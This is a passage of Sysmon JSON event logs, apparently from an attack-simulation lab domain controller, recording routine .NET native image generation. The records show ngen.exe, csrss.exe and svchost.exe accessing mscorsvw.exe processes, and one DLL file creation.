07:01:21.903","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00107EB40A00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.903\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00107EB40A00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.903","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00107EB40A00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.919\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-00104E9D0D00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.919","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-00104E9D0D00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.966\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010B23D0D00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.966","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010B23D0D00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.966\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010B23D0D00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.966","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010B23D0D00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010B23D0D00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010B23D0D00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:22.169\r\nProcessGuid: {E2A3D6B1-1341-5F25-0000-0010E0A00D00}\r\nProcessId: 3080\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c08-0\\PresentationFramework.Classic.dll\r\nCreationUtcTime: 2020-08-01 07:01:22.169","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:22.169","ProcessGuid":"{E2A3D6B1-1341-5F25-0000-0010E0A00D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c08-0\\PresentationFramework.Classic.dll","CreationUtcTime":"2020-08-01 07:01:22.169","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.216\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105C410D00}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.216","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105C410D00}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.216\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105C410D00}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.216","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105C410D00}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105C410D00}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 